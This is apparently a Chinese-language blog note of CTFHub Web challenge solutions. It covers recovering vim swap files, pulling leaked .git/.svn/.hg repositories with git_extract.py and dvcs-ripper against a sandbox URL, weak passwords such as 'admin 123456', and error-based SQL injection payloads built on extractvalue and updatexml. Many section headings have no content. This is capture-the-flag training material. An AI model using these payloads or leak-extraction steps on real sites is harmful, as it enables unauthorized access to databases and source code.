【CTFHUB】Web技能树

Web

HTTP协议

请求方式

 

302跳转

 

cookie

 

基础认证

 

响应包源代码

 

信息泄露

目录遍历

 

phpinfo

 

备份文件下载

网站源码

 

bak文件

 

vim缓存

下载下来放到linux中
在文件前面加的点(.)   .index.php.swp
然后运行 vi -r index.php
 

.DS_Store

记事本打开
 

Git泄露

Log

python git_extract.py http://challenge-8cff71d12c02de35.sandbox.ctfhub.com:10080/.git/
 

Stash

同上
 

Index

同上
 

SVN泄露

使用dvcs-ripper工具
 

HG泄露

使用dvcs-ripper工具
 
 

密码口令

弱口令

admin 123456
 

默认口令

百度搜索亿邮邮件网关默认口令
 
 
 

SQL注入

整数型注入

 

字符型注入

 

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );
updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
只能显示32位:
substr(字符串,开始位置,长度)

你可能感兴趣的:(【CTFHUB】Web技能树)